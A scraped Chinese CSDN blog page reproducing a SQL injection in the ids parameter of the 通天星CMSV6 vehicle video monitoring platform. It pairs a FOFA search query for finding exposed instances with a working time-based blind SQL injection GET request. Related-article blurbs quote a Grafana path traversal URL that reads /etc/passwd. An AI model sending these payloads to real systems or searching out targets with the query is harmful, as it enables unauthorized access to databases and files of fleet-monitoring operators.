【漏洞复现】通天星CMSV6车载监控平台ids SQL注入漏洞

最新推荐文章于 2024-08-12 15:40:51 发布

晚风不及你ღ

最新推荐文章于 2024-08-12 15:40:51 发布

阅读量262

点赞数

文章标签： web安全

本文链接：https://blog.csdn.net/qq_37113223/article/details/138175920

版权

【漏洞复现】专栏收录该内容

150 篇文章

已下架不支持订阅

漏洞描述：

通天星CMSV6车载定位监控平台拥有以位置服务、无线3G/4G视频传输、云存储服务为核心的研发团队，专注于为定位、无线视频终端产品提供平台服务，通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。

通天星CMSV6车载视频监控平台/run_stop/delete.do;downloadLogger.action文件ids参数存在SQL注入漏洞，攻击者可以通过此漏洞获取数据库信息。

搜索语法:

Fofa-Query: web.body="/808gps/"

漏洞详情：

1.通天星CMSV6车载视频监控平台。

2.漏洞POC：

GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--&

了解本专栏

已下架不支持订阅

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

晚风不及你ღ

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
2
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

已下架不支持订阅

通天星CMSV6车载视频监控平台disable接口处存在SQL注入漏洞 [附POC]

薛定谔嘚喵博客

07-23

384

通天星CMSV6车载视频监控平台disable存在SQL注入漏洞，攻击者可以通过构造恶意的SQL语句，成功注入并执行恶意数据库操作，可能导致敏感信息泄露、数据库被篡改或其他严重后果。

【漏洞复现】通天星CMSV6车载监控平台Login弱口令漏洞

晚风不及你

04-25

193

通天星CMSV6车载视频监控平台存在弱口令漏洞，导致攻击者通过此漏洞登录系统获取敏感信息。

2 条评论您还未登录，请先登录后发表或查看评论

通天星CMSV6车载定位监控平台 SQL注入漏洞复现（含nuclei-poc）

m0_50797689的博客

03-18

491

通天星CMSV6车载定位监控平台 SQL注入漏洞复现（含nuclei-poc）

通天星CMSV6车载定位监控平台 point_manage/merge SQL注入致RCE漏洞复现

0xSec

06-24

1205

2024年5月，通天星CMSV6发布新版本修复了一处SQL注入漏洞。漏洞是由于通天星CMSV6车载定位监控平台未对用户的输入进行预编译，直接将其拼接进了SQL查询语句中，导致系统出现SQL注入漏洞。该漏洞可通过SQL注入实现文件写入进行远程代码执行，获取服务器权限。建议及时修复漏洞。

【漏洞复现】通天星CMSV6车载监控平台Druid弱口令漏洞

晚风不及你

04-25

301

通天星CMSV6车载视频监控平台存在Druid弱口令漏洞，导致攻击者通过此漏洞登录系统获取敏感信息。

通天星CMSV6车载定位监控平台 disable SQL注入漏洞复现

0xSec

07-22

1263

该漏洞是由于通天星CMSV6车载定位监控平台 /edu_security_officer/disable接口处未对用户的输入进行有效的过滤，直接将其拼接进了SQL查询语句中，导致系统出现SQL注入漏洞。该漏洞可配合任意文件读取获取网站绝对路径写入后门文件进行远程代码执行。

通天星CMSV6车载视频监控平台 disable存在SQL注入漏洞

xiaokp7的博客

07-24

579

通天星CMSV6车载视频监控平台是东莞市通天星软件科技有限公司研发的监控平台，通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。通天星科技应用于公交车车载、校车车载、大巴车车载、物流车载、油品运输车载、警车车载等公共交通视频监控，还应用在家居看护、商铺远程监控、私家车的行驶分享仪上等。

通天星CMSV6车载视频监控平台默认口令漏洞

weixin_43567873的博客

03-28

323

通天星CMSV6车载视频监控平台默认口令漏洞

【漏洞复现】通天星CMSV6车载定位监控平台 downloadLogger.action SQL注入漏洞

https://blog.echo234.cn/

03-25

613

路由器漏洞复现_看了之后每个人都是黑客

m0_67742636的博客

06-20

1006

渗透测试，网络安全，路由器安全

【漏洞复现】鲸发卡系统 /pay/xinhui/request_post 任意文件读取漏洞

最新发布

网安小白

08-12

828

鲸发卡系统 /pay/xinhui/request_post 接口处存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件），导致网站处于极度不安全状态。

【漏洞复现】常见框架漏洞复现合集

qq_48368964的博客

08-07

1716

ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的，是一个快速、兼容而且简单的轻量级国产PHP开发框架，诞生于2006年初，原名FCS，2007年元旦正式更名为ThinkPHP，遵循Apache2开源协议发布，从Struts结构移植过来并做了改进和完善，同时也借鉴了国外很多优秀的框架和模式，使用面向对象的开发结构和MVC模式，融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式。

开发实战(5)--fofa进行漏洞poc的信息收集

记录开发和安全学习过程中的点点滴滴

04-21

3269

突破fafa信息采集时只能查看5页数据, 主要还是围绕渗透测试的流程进行开发,一般在信息收集后,在渗透测试后,在发现通用型漏洞时,我们为了节省时间,可以通过写批量脚本来信息收集,然后使用poc来进行批量验证.作为一个fofa工程师,那么我们当然是使用fofa进行信息搜集喽,刚好也借着这个机会熟悉一下fofa的API文档,为后面写利用工具做好铺垫,当然目前还是用不到API的,问就是用不起,所以只能写脚本突破注册会员限制进行信息爬取。

【漏洞复现】WordPress——Recall——SQL注入（CVE-2024-32709）

LongL_GuYu的博客

07-11

1896

Plechev Andrey WP-Recall存在SQL注入漏洞。该漏洞影响WP-Recall版本从n/a到16.26.5。攻击者可以利用该漏洞在SQL命令中不恰当地中立化特殊元素，造成数据库被恶意操作的风险。

未授权访问漏洞

m0_63944205的博客

08-04

796

应用广泛，如BBC用在其动态内容展示平台，Credit Suisse用在其内部的商品部门的市场框架，Meebo，用在其社交平台(web和应用程序)。修改docker swarm的认证方式，使用TLS认证:Overview Swarm with TLS 和 Configure DockerSwarm for TLS这两篇文档，说的是配置好TLS后，DockerCLl在发送命令到docker daemon之前，会首先发送它的证书，如果证书是由daemon信任的CA所签名的，才可以继续执行。

三十种未授权访问漏洞复现合集（一）

qq_48368964的博客

08-03

2358

开启MongoDB服务时不添加任何参数时,默认是没有权限验证的,登录的用户可以通过默认端口无需密码对数据库任意操作（增、删、改、查高危动作）而且可以远程访问数据库。造成未授权访问的根本原因就在于启动 Mongodb 的时候未设置 –auth 也很少会有人会给数据库添加上账号密码（默认空口令），使用默认空口令这将导致恶意攻击者无需进行账号认证就可以登陆到数据服务器。

一波三折，终于找到src漏洞挖掘的方法了【建议收藏】

A_991128a的博客

02-16

672

同时，业务逻辑纷繁复杂，再资深的程序员也可能挖坑，所以只要基础扎实，逻辑思维能力强，耐心细心，不放过任何一个步骤，此类漏洞比较容易挖。比如在第一步认证原手机号时，随意输入验证码，将response包中的相关字段进行修改，比如0改成1，false改成true，即可绕过第一步验证，进入填写新手机号界面，如果第三步提交修改时没有验证第一步的结果，就会造成逻辑漏洞。在网站的JS文件中，会存在各种对测试有帮助的内容，JSFinder可以帮助我们获取到JS中的url和子域名的信息，拓展我们的渗透范围。

Grafana 未授权任意文件读取漏洞复现

渗透测试研究中心

12-16

5683

1.fofa 批量搜索 app="Grafana" 漏洞URL: {{BaseURL}}/public/plugins/{{plugin-id}}/../../../../../../../../../../../../../../../../../../../etc/passwd 2.获取远程目标linux系统的/etc/passwd密码信息 /public/plugins/alertGroups/../../../../../../../../etc/passwd/public/plugin

【漏洞复现】【含fofa搜索语法】AVD-2024-28995 SolarWinds Serv-U FTP 目录遍历文件读取漏洞（CVE-2024-28995）

zzxx191z的博客

07-02

563

漏洞复现------SolarWinds是一款全球最受欢迎的IT统一运维监控管理平台，用于网络管理和监控工具。它可以监控、发现网络设备，易于使用，适用于中小企业和大型企业网络部署与搭建。

cmsv6 sql注入漏洞

04-26

CMSv6是一个广泛使用的内容管理系统，而SQL注入漏洞是一种常见的Web应用程序漏洞。当Web应用程序没有正确过滤用户输入或使用不安全的查询方法时，攻击者可以利用SQL注入漏洞向数据库发送恶意的SQL代码，从而获取、修改或删除数据库中的数据。 CMSv6的SQL注入漏洞可能导致以下风险： 1. 数据泄露：攻击者可以通过注入恶意的SQL代码来获取数据库中的敏感信息，如用户账号、密码等。 2. 数据篡改：攻击者可以修改数据库中的数据，包括修改用户信息、文章内容等。 3. 数据删除：攻击者可以通过注入删除语句删除数据库中的数据，导致数据的不可恢复性损失。为了防止SQL注入漏洞，开发者应该采取以下措施： 1. 使用参数化查询或预编译语句来处理用户输入，确保输入数据经过正确的转义和过滤。 2. 对于动态生成的SQL查询，避免直接拼接用户输入到查询语句中，而是使用参数化查询。 3. 限制数据库用户的权限，确保数据库用户只能执行必要的操作，并且不允许直接执行危险的SQL语句。